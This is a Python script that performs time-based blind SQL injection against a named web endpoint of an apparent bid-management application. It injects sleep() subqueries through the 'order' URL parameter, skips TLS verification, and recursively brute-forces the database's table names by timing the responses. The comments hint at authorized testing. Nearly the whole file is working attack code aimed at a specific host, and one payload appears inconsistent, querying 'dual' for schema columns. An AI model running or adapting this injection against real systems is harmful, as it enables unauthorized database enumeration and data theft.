sql

1. #/usr/bin/python3
2.  
3. import requests
4. import string
5. import urllib3
6.  
7. # Disable ssl warnings because of the VPN connection
8. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
9.  
10. # Requests stuff
11. BASE_URL = "https://my.hughesnet.com.uat2.net"
12. USER_AGENT = {
13.     "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
14. }
15. # SQLi sleep time
16. SLEEP_TIME = 10
17.  
18. # Build the character pool
19. CHARACTER_POOL = []
20. CHARACTER_POOL.extend(string.ascii_letters)
21. CHARACTER_POOL.extend(string.digits)
22. CHARACTER_POOL.extend([".", "_", "-", " ", "~", "|", "/", "(", ")", "=", "@", "\t", "\n"])
23. CHARACTER_POOL.sort()
24.  
25. # Define cache, really only needed to speed up testing
26. CACHE = []
27. CACHE.sort()
28.  
29. # Result array
30. VALID_WORDS = []
31.  
32.  
33. # Current queries enumerate all tables in the database
34. def do_like_query(prefix: str) -> bool:
35.     # Check cache
36.     print(f"Testing characters with LIKE query: {prefix}")
37.     if len(VALID_WORDS) == 0 and len(CACHE) > 0:
38.         last_word = CACHE[-1]
39.         for known_letter, new_letter in zip(last_word, prefix):
40.             if known_letter > new_letter:
41.                 print(f"like cache hit for {known_letter=} with {new_letter=} in {prefix=}")
42.                 return False
43.     # Do real request
44.     prefix = prefix.replace("_", "\_")
45.     like_payload = f",(select * from (select sleep({SLEEP_TIME}) from dual where table_schema = 'BidManager' and table_name like binary '{prefix}%%')a)-- "
46.     path = f"/bidmanager/company/browse.pyt?query=test&order=ASC{like_payload}&fromPagination=1&orderBy=quantityRequired"
47.     url = BASE_URL + path
48.  
49.     try:
50.         res = requests.get(url, headers=USER_AGENT, timeout=SLEEP_TIME + 1, verify=False)
51.         time_taken = res.elapsed.total_seconds()
52.         return time_taken > SLEEP_TIME
53.     except requests.exceptions.ReadTimeout:
54.         return True
55.  
56.  
57. # Validate the found word to eliminate false positives
58. def do_exact_query(search: str) -> bool:
59.     # Check cache
60.     print(f"Validating result with exact query: {search}")
61.     if search in CACHE:
62.         print("exact cache hit")
63.         return True
64.     # Do real request
65.     if "_" in search:
66.         search = search.replace("_", "\_")
67.     exact_payload = f",(select * from (select sleep({SLEEP_TIME}) from information_schema.tables where table_schema = 'BidManager' and binary table_name = '{search}')a)-- "
68.     path = f"/bidmanager/company/browse.pyt?query=test&order=ASC{exact_payload}&fromPagination=1&orderBy=quantityRequired"
69.     url = BASE_URL + path
70.  
71.     try:
72.         res = requests.get(url, headers=USER_AGENT, timeout=SLEEP_TIME + 1, verify=False)
73.         time_taken = res.elapsed.total_seconds()
74.         return time_taken > SLEEP_TIME
75.     except requests.exceptions.ReadTimeout:
76.         return True
77.  
78.  
79. # Actually do some programming
80. def main(prefix: str = ""):
81.     for idx, char in enumerate(CHARACTER_POOL):
82.         results = do_like_query(prefix + char)
83.         if results:
84.             print("[+] Got a hit, entering next recursion depth")
85.             main(prefix + char)
86.         else:
87.             if idx == (len(CHARACTER_POOL) - 1) and do_exact_query(prefix):
88.                 print("[+] Validation successful!")
89.                 VALID_WORDS.append(prefix)
90.                 print(f"Word found: {prefix}")
91.  
92.  
93. if __name__ == '__main__':
94.     main()
95.     print(f"Results: {VALID_WORDS}")
96.